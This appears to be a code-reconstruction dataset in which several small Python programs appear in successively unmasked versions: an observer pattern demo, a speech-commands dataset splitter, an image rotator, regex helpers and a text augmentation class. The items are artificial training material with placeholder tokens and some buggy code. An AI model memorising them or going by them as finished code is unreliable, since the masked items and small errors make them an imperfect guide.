"""
Abstract Observable
"""
def __init__(self):
self.__observers = []
def add_observer(self, observer):
self.__observers.append(observer)
def remove_observer(self, observer):
self.__observers.remove(observer)
def notify_observers(self, arg=0):
for o in self.__observers:
o.update(self, arg)
class AbstractObserver:
"""
Abstract Observer - Abstract device
"""
def __init__(self):
pass
    def update(self, observable, arg):
pass
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {'temperature': 0.0, 'humidity': 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f'Parameter type {measure_key} not supported.')
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value('temperature')
if temperature > 37.8:
print(f'WARNING - Temperature too high: {temperature}')
elif temperature < 36.0:
                print(f'WARNING - Temperature too low: {temperature}')
else:
print(f'INFO - Temperature normal: {temperature}')
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value('humidity')
if humidity_value > 60:
print(f'WARNING - humidity too high: {humidity_value}')
elif humidity_value < 40:
                print(f'WARNING - humidity too low: {humidity_value}')
else:
print(f'INFO - humidity normal: {humidity_value}')
else:
pass
<mask token>
| class AbstractObservable:
"""
Abstract Observable
"""
def __init__(self):
self.__observers = []
def add_observer(self, observer):
self.__observers.append(observer)
def remove_observer(self, observer):
self.__observers.remove(observer)
def notify_observers(self, arg=0):
for o in self.__observers:
o.update(self, arg)
class AbstractObserver:
"""
Abstract Observer - Abstract device
"""
def __init__(self):
pass
def update(self):
pass
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {'temperature': 0.0, 'humidity': 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f'Parameter type {measure_key} not supported.')
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value('temperature')
if temperature > 37.8:
print(f'WARNING - Temperature too high: {temperature}')
elif temperature < 36.0:
                print(f'WARNING - Temperature too low: {temperature}')
else:
print(f'INFO - Temperature normal: {temperature}')
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value('humidity')
if humidity_value > 60:
print(f'WARNING - humidity too high: {humidity_value}')
elif humidity_value < 40:
                print(f'WARNING - humidity too low: {humidity_value}')
else:
print(f'INFO - humidity normal: {humidity_value}')
else:
pass
import time
if __name__ == '__main__':
tuck = MonitorTruck('John')
thermometer = Thermometer()
humidity = HumidityMeter()
for i in range(0, 15):
time.sleep(1.5)
print('====== Time step {} ======='.format(i + 1))
if i == 3:
tuck.add_observer(thermometer)
elif i == 5:
tuck.add_observer(humidity)
elif i == 10:
tuck.remove_observer(thermometer)
if i % 3 == 0:
tuck.set_value('temperature', 35.5 + 0.5 * i)
elif i % 3 == 1:
tuck.set_value('humidity', 30 + 3 * i)
| # Based on https://dev.to/jemaloqiu/design-pattern-in-python-2-observer-j4
class AbstractObservable():
"""
Abstract Observable
"""
def __init__(self):
self.__observers = []
def add_observer(self, observer):
self.__observers.append(observer)
def remove_observer(self, observer):
self.__observers.remove(observer)
def notify_observers(self, arg=0):
for o in self.__observers:
o.update(self, arg)
class AbstractObserver():
"""
Abstract Observer - Abstract device
"""
def __init__(self):
pass
def update(self):
pass
#
class MonitorTruck(AbstractObservable):
"""
Concrete Observable class
"""
def __init__(self, name):
super().__init__()
self.name = name
self.__physical_properties = {"temperature": 0.0, "humidity": 0.0}
def set_value(self, measure_key, val):
if measure_key in self.__physical_properties:
self.__physical_properties[measure_key] = val
self.notify_observers()
else:
print(f"Parameter type {measure_key} not supported.")
def get_value(self, measure_key):
return self.__physical_properties.get(measure_key)
class Thermometer(AbstractObserver):
"""
Concrete Observer - Thermometer
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
temperature = tt.get_value("temperature")
if temperature > 37.8:
print(f"WARNING - Temperature too high: {temperature}" )
elif temperature < 36.0:
print(f"WARNING - Temperature too slow: {temperature}")
else:
print(f"INFO - Temperature normal: {temperature}")
else:
pass
class HumidityMeter(AbstractObserver):
"""
Concrete Observer - humidity meter
"""
def __init__(self):
super().__init__()
def update(self, tt, obj):
if tt.__class__ == MonitorTruck:
humidity_value = tt.get_value("humidity")
if humidity_value > 60:
print(f"WARNING - humidity too high: {humidity_value}" )
elif humidity_value < 40:
print(f"WARNING - humidity too high: {humidity_value}" )
else:
print(f"INFO - humidity normal: {humidity_value}")
else:
pass
import time
if __name__ == "__main__":
tuck = MonitorTruck("John")
thermometer = Thermometer()
humidity = HumidityMeter()
## now kick off the simulation
for i in range(0, 15):
time.sleep(1.5)
print("====== Time step {} =======".format(i+1))
# At rount #3: thermometer is added for monitoring temperature
# At rount #5: humidity is added for monitoring the humidity level
# At rount #10: thermometer is removed
if i == 3:
tuck.add_observer(thermometer)
elif i == 5:
tuck.add_observer(humidity)
elif i == 10:
tuck.remove_observer(thermometer)
# simulating the physical parameters
if i%3 ==0:
tuck.set_value("temperature", 35.5 + 0.5*i)
elif i%3 == 1:
tuck.set_value("humidity", 30 + 3*i)
| [
13,
21,
23,
25,
26
] |
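One note on the observer classes in the entry above: AbstractObserver.update is declared with no extra parameters, while notify_observers calls the concrete observers as update(self, tt, obj). A hedged sketch of a base-class signature that matches the concrete call sites (an illustrative fix, not part of the original entry):

class AbstractObserver:
    """Abstract Observer whose signature matches notify_observers(self, arg)."""
    def update(self, observable, arg=0):
        # observable is the notifying subject; arg is the optional payload
        raise NotImplementedError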
663 | 9d3439a2be1f22c8ec59923b88ac22877a4f13e8 | <mask token>
| <mask token>
m.sort(reverse=True)
<mask token>
while x > 0:
res += max(0, m[i])
m[i] -= 1
x -= 1
if m[i % n] < m[(i + 1) % n]:
i = (i + 1) % n
print(res)
| n, x = input().split()
n = int(n)
x = int(x)
m = [int(i) for i in input().split()]
m.sort(reverse=True)
i = 0
res = 0
while x > 0:
res += max(0, m[i])
m[i] -= 1
x -= 1
if m[i % n] < m[(i + 1) % n]:
i = (i + 1) % n
print(res)
| null | null | [
0,
1,
2
] |
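The snippet above greedily takes the current maximum value x times, decrementing it after each pick. A self-contained sketch of the same idea using a max-heap (the input values are inlined as an illustrative example rather than read from stdin):

import heapq

def max_total(values, x):
    heap = [-v for v in values]  # negate to simulate a max-heap with Python's min-heap
    heapq.heapify(heap)
    total = 0
    for _ in range(x):
        top = -heapq.heappop(heap)
        total += max(0, top)  # never add negative values
        heapq.heappush(heap, -(top - 1))
    return total

print(max_total([3, 2, 2], 4))  # picks 3, 2, 2, 2 -> 9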
664 | 6b2fc94d9a53b8f669cab5e1fb625dd01e20ba98 | <mask token>
| <mask token>
def move_files(src_folder, to_folder, list_file):
with open(list_file) as f:
for line in f.readlines():
line = line.rstrip()
dirname = os.path.dirname(line)
dest = os.path.join(to_folder, dirname)
if not os.path.exists(dest):
os.mkdir(dest)
shutil.move(os.path.join(src_folder, line), dest)
<mask token>
| <mask token>
def move_files(src_folder, to_folder, list_file):
with open(list_file) as f:
for line in f.readlines():
line = line.rstrip()
dirname = os.path.dirname(line)
dest = os.path.join(to_folder, dirname)
if not os.path.exists(dest):
os.mkdir(dest)
shutil.move(os.path.join(src_folder, line), dest)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=
'Split google commands train dataset.')
parser.add_argument('root', type=str, help=
        'the path to the root folder of the google commands train dataset.')
args = parser.parse_args()
audio_folder = os.path.join(args.root, 'audio')
validation_path = os.path.join(audio_folder, 'validation_list.txt')
test_path = os.path.join(audio_folder, 'testing_list.txt')
valid_folder = os.path.join(args.root, 'valid')
test_folder = os.path.join(args.root, 'test')
train_folder = os.path.join(args.root, 'train')
os.mkdir(valid_folder)
os.mkdir(test_folder)
move_files(audio_folder, test_folder, test_path)
move_files(audio_folder, valid_folder, validation_path)
os.rename(audio_folder, train_folder)
| <mask token>
import os
import shutil
import argparse
def move_files(src_folder, to_folder, list_file):
with open(list_file) as f:
for line in f.readlines():
line = line.rstrip()
dirname = os.path.dirname(line)
dest = os.path.join(to_folder, dirname)
if not os.path.exists(dest):
os.mkdir(dest)
shutil.move(os.path.join(src_folder, line), dest)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=
'Split google commands train dataset.')
parser.add_argument('root', type=str, help=
        'the path to the root folder of the google commands train dataset.')
args = parser.parse_args()
audio_folder = os.path.join(args.root, 'audio')
validation_path = os.path.join(audio_folder, 'validation_list.txt')
test_path = os.path.join(audio_folder, 'testing_list.txt')
valid_folder = os.path.join(args.root, 'valid')
test_folder = os.path.join(args.root, 'test')
train_folder = os.path.join(args.root, 'train')
os.mkdir(valid_folder)
os.mkdir(test_folder)
move_files(audio_folder, test_folder, test_path)
move_files(audio_folder, valid_folder, validation_path)
os.rename(audio_folder, train_folder)
| """Splits the google speech commands into train, validation and test sets.
"""
import os
import shutil
import argparse
def move_files(src_folder, to_folder, list_file):
with open(list_file) as f:
for line in f.readlines():
line = line.rstrip()
dirname = os.path.dirname(line)
dest = os.path.join(to_folder, dirname)
if not os.path.exists(dest):
os.mkdir(dest)
shutil.move(os.path.join(src_folder, line), dest)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Split google commands train dataset.')
parser.add_argument('root', type=str, help='the path to the root folder of te google commands train dataset.')
args = parser.parse_args()
audio_folder = os.path.join(args.root, 'audio')
validation_path = os.path.join(audio_folder, 'validation_list.txt')
test_path = os.path.join(audio_folder, 'testing_list.txt')
valid_folder = os.path.join(args.root, 'valid')
test_folder = os.path.join(args.root, 'test')
train_folder = os.path.join(args.root, 'train')
os.mkdir(valid_folder)
os.mkdir(test_folder)
move_files(audio_folder, test_folder, test_path)
move_files(audio_folder, valid_folder, validation_path)
os.rename(audio_folder, train_folder)
| [
0,
1,
2,
3,
4
] |
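A small self-contained exercise of move_files from the entry above; the tiny fake layout below is an assumption built just for the demo (the real dataset ships validation_list.txt and testing_list.txt inside audio/):

import os
import tempfile

root = tempfile.mkdtemp()
src = os.path.join(root, 'audio')
os.makedirs(os.path.join(src, 'yes'))
open(os.path.join(src, 'yes', 'a.wav'), 'w').close()
list_file = os.path.join(src, 'testing_list.txt')
with open(list_file, 'w') as f:
    f.write('yes/a.wav\n')
test_dir = os.path.join(root, 'test')
os.mkdir(test_dir)
move_files(src, test_dir, list_file)  # assumes move_files from above is in scope
print(os.listdir(os.path.join(test_dir, 'yes')))  # ['a.wav']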
665 | 3e1540a06c478d471f6e6a190cadc44d5c4c2467 | <mask token>
class Record:
def __init__(self, value=10, name='name'):
self.id = name
self.value = value
<mask token>
<mask token>
| <mask token>
class Record:
def __init__(self, value=10, name='name'):
self.id = name
self.value = value
<mask token>
def __set__(self, instance, value):
with open('record.txt', 'a') as f:
            msg = 'Changed variable %s to %s ' % (self.id, str(value))
            tmp = t.localtime()[:6]
            form = ['-', '-', ' ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
self.value = value
| <mask token>
class Record:
def __init__(self, value=10, name='name'):
self.id = name
self.value = value
def __get__(self, instance, owner):
with open('record.txt', 'a') as f:
            msg = 'Read variable %s ' % self.id
            tmp = t.localtime()[:6]
            form = ['-', '-', ' ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
return self.value
def __set__(self, instance, value):
with open('record.txt', 'a') as f:
            msg = 'Changed variable %s to %s ' % (self.id, str(value))
            tmp = t.localtime()[:6]
            form = ['-', '-', ' ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
self.value = value
| import time as t
class Record:
def __init__(self, value=10, name='name'):
self.id = name
self.value = value
def __get__(self, instance, owner):
with open('record.txt', 'a') as f:
            msg = 'Read variable %s ' % self.id
            tmp = t.localtime()[:6]
            form = ['-', '-', ' ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
return self.value
def __set__(self, instance, value):
with open('record.txt', 'a') as f:
            msg = 'Changed variable %s to %s ' % (self.id, str(value))
            tmp = t.localtime()[:6]
            form = ['-', '-', ' ', ':', ':', '']
for i in range(6):
msg = msg + str(tmp[i]) + form[i]
f.write('\n')
f.write(msg)
self.value = value
| null | [
2,
3,
4,
5
] |
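The Record descriptor above only takes effect when installed as a class attribute, which the entry never demonstrates. A minimal usage sketch (the Account class and its attribute name are illustrative assumptions, not from the dataset):

class Account:
    balance = Record(value=100, name='balance')  # descriptors must live on the class

acct = Account()
print(acct.balance)  # routes through Record.__get__ and logs to record.txt
acct.balance = 250   # routes through Record.__set__
# caveat: the value is stored on the descriptor itself, so all instances share it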
666 | ba216642935d19b85e379b66fb514854ebcdedd9 | <mask token>
| <mask token>
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
<mask token>
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
<mask token>
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(command,
query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),
shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call(
'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.
format(std_dir, std_dir), shell=True)
| <mask token>
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
std_dir = sys.argv[1]
std_ans = sys.argv[2]
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
op_f = open('{}/jobs'.format(std_dir), 'w')
command = 'utils/single_query_example.py'
query = std_dir + '/query.pkl'
doc = std_dir + '/doc.pkl'
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(command,
query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),
shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call(
'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.
format(std_dir, std_dir), shell=True)
| import subprocess
import sys
import pickle
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
std_dir = sys.argv[1]
std_ans = sys.argv[2]
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
op_f = open('{}/jobs'.format(std_dir), 'w')
command = 'utils/single_query_example.py'
query = std_dir + '/query.pkl'
doc = std_dir + '/doc.pkl'
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(command,
query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir),
shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call(
'utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.
format(std_dir, std_dir), shell=True)
| #!/usr/bin/env python3
import subprocess
import sys
import pickle
if len(sys.argv) != 3:
print('Usage: std_dev_eval.py <std_dir> <ans>')
quit()
std_dir=sys.argv[1]
std_ans=sys.argv[2]
subprocess.call('rm -f {}/result'.format(std_dir), shell=True)
op_f = open('{}/jobs'.format(std_dir), 'w')
command = 'utils/single_query_example.py'
query = std_dir + '/query.pkl'
doc = std_dir + '/doc.pkl'
with open(query, 'rb') as fp:
query_num = len(pickle.load(fp))
for idx in range(query_num):
op_f.write('{} {} {} {} {} >>{}/querywise_result\n'.format(
command, query, doc, idx, std_ans, std_dir))
op_f.close()
subprocess.call('cat {}/jobs | parallel --no-notice -j 4 '.format(std_dir), shell=True)
subprocess.call('rm {}/*.pkl'.format(std_dir), shell=True)
subprocess.call('utils/calculate_std_average_result.py {}/querywise_result >{}/MAP'.format(std_dir, std_dir), shell=True)
| [
0,
1,
2,
3,
4
] |
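A usage sketch for the evaluation driver above; the file names come from the code itself, while the paths are placeholders:

# <std_dir> must contain query.pkl and doc.pkl; one job per query is
# written to <std_dir>/jobs, run through GNU parallel, then averaged:
#
#   python std_dev_eval.py path/to/std_dir path/to/answers
#
# Per-query scores land in <std_dir>/querywise_result, the mean in <std_dir>/MAP.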
667 | cd104eec21be8a59e8fb3bd8ab061dd357fc126a | <mask token>
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = '{}{}{}'.format(dst, os.sep, os.path.basename(file_))
img.save(name)
<mask token>
| <mask token>
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = '{}{}{}'.format(dst, os.sep, os.path.basename(file_))
img.save(name)
<mask token>
rotate(common, dst)
| <mask token>
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = '{}{}{}'.format(dst, os.sep, os.path.basename(file_))
img.save(name)
src = '/home/andrew/code/tmp_photos'
dst = '/home/andrew/code/tmp_photos2'
common = glob.glob('{}{}*.*'.format(src, os.sep))
rotate(common, dst)
| import glob
import os
from PIL import Image
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = '{}{}{}'.format(dst, os.sep, os.path.basename(file_))
img.save(name)
src = '/home/andrew/code/tmp_photos'
dst = '/home/andrew/code/tmp_photos2'
common = glob.glob('{}{}*.*'.format(src, os.sep))
rotate(common, dst)
| #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Author: xurongzhong#126.com 技术支持qq群:6089740
# CreateDate: 2018-3-27
# pillow_rotate.py
import glob
import os
from PIL import Image
def rotate(files, dst, value=90):
for file_ in files:
img = Image.open(file_)
img = img.rotate(value)
name = "{}{}{}".format(dst, os.sep, os.path.basename(file_))
img.save(name)
src = r'/home/andrew/code/tmp_photos'
dst = r'/home/andrew/code/tmp_photos2'
common = glob.glob('{}{}*.*'.format(src, os.sep))
rotate(common, dst)
| [
1,
2,
3,
4,
5
] |
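One caveat on the helper above: Image.rotate keeps the original canvas size, so angles other than multiples of 180 can clip pixels on non-square images. A hedged variant using expand=True (an alternative behavior, not the original one):

from PIL import Image

def rotate_keep_all(src_path, dst_path, value=90):
    img = Image.open(src_path)
    # expand=True grows the canvas so no pixels are clipped
    img.rotate(value, expand=True).save(dst_path)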
668 | b1c06e9c5516a378c0bbce2ce9e17afaeae01928 | <mask token>
class RegexCompiles:
re_compile_product_id = re.compile('Product-Id=[0-9]*')
re_compile_id = re.compile('[0-9]+')
<mask token>
| <mask token>
class RegexCompiles:
re_compile_product_id = re.compile('Product-Id=[0-9]*')
re_compile_id = re.compile('[0-9]+')
<mask token>
def verify_card_title(title, given_title) ->bool:
title = title.lower()
given_title = given_title.lower()
for token in given_title.strip().split():
if find_whole_word(title, token) is None:
return False
return True
def get_product_id(link_to_product) ->int:
s_matched = RegexCompiles.re_compile_product_id.search(link_to_product
).group()
id_matched = RegexCompiles.re_compile_id.search(s_matched).group()
return int(id_matched)
| <mask token>
class RegexCompiles:
re_compile_product_id = re.compile('Product-Id=[0-9]*')
re_compile_id = re.compile('[0-9]+')
def find_whole_word(text, word) ->bool:
return re.compile('\\b({0})\\b'.format(word), flags=re.IGNORECASE).search(
text)
def verify_card_title(title, given_title) ->bool:
title = title.lower()
given_title = given_title.lower()
for token in given_title.strip().split():
if find_whole_word(title, token) is None:
return False
return True
def get_product_id(link_to_product) ->int:
s_matched = RegexCompiles.re_compile_product_id.search(link_to_product
).group()
id_matched = RegexCompiles.re_compile_id.search(s_matched).group()
return int(id_matched)
| import re
class RegexCompiles:
re_compile_product_id = re.compile('Product-Id=[0-9]*')
re_compile_id = re.compile('[0-9]+')
def find_whole_word(text, word) ->bool:
return re.compile('\\b({0})\\b'.format(word), flags=re.IGNORECASE).search(
text)
def verify_card_title(title, given_title) ->bool:
title = title.lower()
given_title = given_title.lower()
for token in given_title.strip().split():
if find_whole_word(title, token) is None:
return False
return True
def get_product_id(link_to_product) ->int:
s_matched = RegexCompiles.re_compile_product_id.search(link_to_product
).group()
id_matched = RegexCompiles.re_compile_id.search(s_matched).group()
return int(id_matched)
| import re
# Class with static regex compilations
class RegexCompiles:
# regex for finding product-id in an EMAG link
re_compile_product_id = re.compile('Product-Id=[0-9]*')
# regex for finding the first number
re_compile_id = re.compile('[0-9]+')
# Verifies if a word exists in a text
def find_whole_word(text, word) -> bool:
return re.compile(r'\b({0})\b'.format(word), flags=re.IGNORECASE).search(text)
# Verifies if all the words in a given title (given_title) exist in another title (title)
def verify_card_title(title, given_title) -> bool:
title = title.lower()
given_title = given_title.lower()
for token in given_title.strip().split():
if find_whole_word(title, token) is None:
return False
return True
# Returns the product id from an emag link
def get_product_id(link_to_product) -> int:
s_matched = RegexCompiles.re_compile_product_id.search(link_to_product).group()
id_matched = RegexCompiles.re_compile_id.search(s_matched).group()
return int(id_matched)
| [
2,
4,
5,
6,
7
] |
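A quick usage sketch for the helpers above; the sample link is fabricated to match the Product-Id= pattern the regex expects:

link = 'https://www.emag.ro/some-product/?X-Product-Id=12345'
print(get_product_id(link))                                   # 12345
print(verify_card_title('Apple iPhone 12 Pro', 'iphone 12'))  # True
print(verify_card_title('Apple iPhone 12 Pro', 'iphone 13'))  # False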
669 | 4a88ce640b6680df925288b44232cf43d585c11c | <mask token>
class Augmentor:
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Augmentor:
def __init__(self) ->None:
self.__AUGMENTATION_VALID__ = 'VALID'
def augment(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor, num_trial: int=2, discriminator:
PreTrainedModel=None, threshold: float=0.8) ->BatchEncoding:
augmented_samples = None
if discriminator is not None and preprocessor is None:
raise Exception(
'To use discriminator, preprocessor should be required.')
for _ in range(num_trial):
original = dataset.shuffle()
augmented = self.generate(original, preprocessor)
if discriminator is not None and preprocessor is not None:
matched, log = self.discriminate(discriminator,
preprocessor, original, augmented, threshold)
def unmatched_to_invalid(example: Dict[str, Any], index: int
) ->Dict[str, Any]:
example[self.__AUGMENTATION_VALID__
] = True if index in matched else False
return example
augmented = augmented.map(unmatched_to_invalid,
with_indices=True)
augmented = augmented.filter(lambda e: e[self.
__AUGMENTATION_VALID__])
if len(augmented) == 0:
continue
if augmented_samples is None:
augmented_samples = augmented
else:
augmented_samples = concatenate_datasets([augmented_samples,
augmented])
if len(dataset) <= len(augmented_samples):
augmented_samples = augmented_samples.select(range(len(
dataset)))
break
if augmented_samples is not None:
augmented_samples = augmented_samples.remove_columns([self.
__AUGMENTATION_VALID__])
augmented_samples = augmented_samples.flatten_indices()
return augmented_samples
<mask token>
def discriminate(self, model: PreTrainedModel, preprocessor:
ClassificationDatasetPreprocessor, original: Dataset, augmented:
Dataset, threshold: float) ->Tuple[List[int], List[Dict[str, Union[
str, float]]]]:
formatted_original = preprocessor.format(original)
original_scores = self.predict(model, formatted_original)
formatted_augmented = preprocessor.format(augmented)
augmented_scores = self.predict(model, formatted_augmented)
matched = []
logs = []
for i, original, original_score, augmented, augmented_score in zip(
range(len(original)), original, original_scores, augmented,
augmented_scores):
if original_score['label'] == augmented_score['label'
] and augmented_score['score'] >= threshold:
matched.append(i)
logs.append({'original': original[preprocessor.input_column],
'original_label': original_score['label'], 'original_score':
original_score['score'], 'augmented': augmented[
preprocessor.input_column], 'augmented_label':
augmented_score['label'], 'augmented_score':
augmented_score['score']})
return matched, logs
def predict(self, model: PreTrainedModel, examples: Dataset) ->List[Dict
[str, Union[int, float]]]:
model.eval()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model.to(device)
with torch.no_grad():
input_ids = examples['input_ids'].to(device)
if 'token_type_ids' in examples.column_names:
token_type_ids = examples['token_type_ids'].to(device)
outputs = model(input_ids, token_type_ids=token_type_ids)
else:
outputs = model(input_ids)
predictions = outputs[0].cpu().numpy()
scores = np.exp(predictions) / np.exp(predictions).sum(-1, keepdims
=True)
return [{'label': model.config.id2label[item.argmax()], 'score':
item.max().item()} for item in scores]
| <mask token>
class Augmentor:
def __init__(self) ->None:
self.__AUGMENTATION_VALID__ = 'VALID'
def augment(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor, num_trial: int=2, discriminator:
PreTrainedModel=None, threshold: float=0.8) ->BatchEncoding:
augmented_samples = None
if discriminator is not None and preprocessor is None:
raise Exception(
'To use discriminator, preprocessor should be required.')
for _ in range(num_trial):
original = dataset.shuffle()
augmented = self.generate(original, preprocessor)
if discriminator is not None and preprocessor is not None:
matched, log = self.discriminate(discriminator,
preprocessor, original, augmented, threshold)
def unmatched_to_invalid(example: Dict[str, Any], index: int
) ->Dict[str, Any]:
example[self.__AUGMENTATION_VALID__
] = True if index in matched else False
return example
augmented = augmented.map(unmatched_to_invalid,
with_indices=True)
augmented = augmented.filter(lambda e: e[self.
__AUGMENTATION_VALID__])
if len(augmented) == 0:
continue
if augmented_samples is None:
augmented_samples = augmented
else:
augmented_samples = concatenate_datasets([augmented_samples,
augmented])
if len(dataset) <= len(augmented_samples):
augmented_samples = augmented_samples.select(range(len(
dataset)))
break
if augmented_samples is not None:
augmented_samples = augmented_samples.remove_columns([self.
__AUGMENTATION_VALID__])
augmented_samples = augmented_samples.flatten_indices()
return augmented_samples
def generate(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor) ->BatchEncoding:
raise NotImplementedError(
'Augmentor subclass should implement augment_sample.')
def discriminate(self, model: PreTrainedModel, preprocessor:
ClassificationDatasetPreprocessor, original: Dataset, augmented:
Dataset, threshold: float) ->Tuple[List[int], List[Dict[str, Union[
str, float]]]]:
formatted_original = preprocessor.format(original)
original_scores = self.predict(model, formatted_original)
formatted_augmented = preprocessor.format(augmented)
augmented_scores = self.predict(model, formatted_augmented)
matched = []
logs = []
for i, original, original_score, augmented, augmented_score in zip(
range(len(original)), original, original_scores, augmented,
augmented_scores):
if original_score['label'] == augmented_score['label'
] and augmented_score['score'] >= threshold:
matched.append(i)
logs.append({'original': original[preprocessor.input_column],
'original_label': original_score['label'], 'original_score':
original_score['score'], 'augmented': augmented[
preprocessor.input_column], 'augmented_label':
augmented_score['label'], 'augmented_score':
augmented_score['score']})
return matched, logs
def predict(self, model: PreTrainedModel, examples: Dataset) ->List[Dict
[str, Union[int, float]]]:
model.eval()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
model.to(device)
with torch.no_grad():
input_ids = examples['input_ids'].to(device)
if 'token_type_ids' in examples.column_names:
token_type_ids = examples['token_type_ids'].to(device)
outputs = model(input_ids, token_type_ids=token_type_ids)
else:
outputs = model(input_ids)
predictions = outputs[0].cpu().numpy()
scores = np.exp(predictions) / np.exp(predictions).sum(-1, keepdims
=True)
return [{'label': model.config.id2label[item.argmax()], 'score':
item.max().item()} for item in scores]
| from typing import Any, Dict, List, Optional, Tuple, Union
import numpy as np
import torch
from datasets import concatenate_datasets
from datasets.arrow_dataset import Dataset
from transfer_classifier.dataset_preprocessor.classification_dataset_preprocessor import ClassificationDatasetPreprocessor
from transformers import PreTrainedModel
from transformers.tokenization_utils import BatchEncoding
class Augmentor:
def __init__(self) ->None:
self.__AUGMENTATION_VALID__ = 'VALID'
def augment(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor, num_trial: int=2, discriminator:
PreTrainedModel=None, threshold: float=0.8) ->BatchEncoding:
augmented_samples = None
if discriminator is not None and preprocessor is None:
raise Exception(
'To use discriminator, preprocessor should be required.')
for _ in range(num_trial):
original = dataset.shuffle()
augmented = self.generate(original, preprocessor)
if discriminator is not None and preprocessor is not None:
matched, log = self.discriminate(discriminator,
preprocessor, original, augmented, threshold)
def unmatched_to_invalid(example: Dict[str, Any], index: int
) ->Dict[str, Any]:
example[self.__AUGMENTATION_VALID__
] = True if index in matched else False
return example
augmented = augmented.map(unmatched_to_invalid,
with_indices=True)
augmented = augmented.filter(lambda e: e[self.
__AUGMENTATION_VALID__])
if len(augmented) == 0:
continue
if augmented_samples is None:
augmented_samples = augmented
else:
augmented_samples = concatenate_datasets([augmented_samples,
augmented])
if len(dataset) <= len(augmented_samples):
augmented_samples = augmented_samples.select(range(len(
dataset)))
break
if augmented_samples is not None:
augmented_samples = augmented_samples.remove_columns([self.
__AUGMENTATION_VALID__])
augmented_samples = augmented_samples.flatten_indices()
return augmented_samples
def generate(self, dataset: Dataset, preprocessor:
ClassificationDatasetPreprocessor) ->BatchEncoding:
raise NotImplementedError(
'Augmentor subclass should implement augment_sample.')
def discriminate(self, model: PreTrainedModel, preprocessor:
ClassificationDatasetPreprocessor, original: Dataset, augmented:
Dataset, threshold: float) ->Tuple[List[int], List[Dict[str, Union[
str, float]]]]:
formatted_original = preprocessor.format(original)
original_scores = self.predict(model, formatted_original)
formatted_augmented = preprocessor.format(augmented)
augmented_scores = self.predict(model, formatted_augmented)
matched = []
logs = []
for i, original, original_score, augmented, augmented_score in zip(
range(len(original)), original, original_scores, augmented,
augmented_scores):
if original_score['label'] == augmented_score['label'
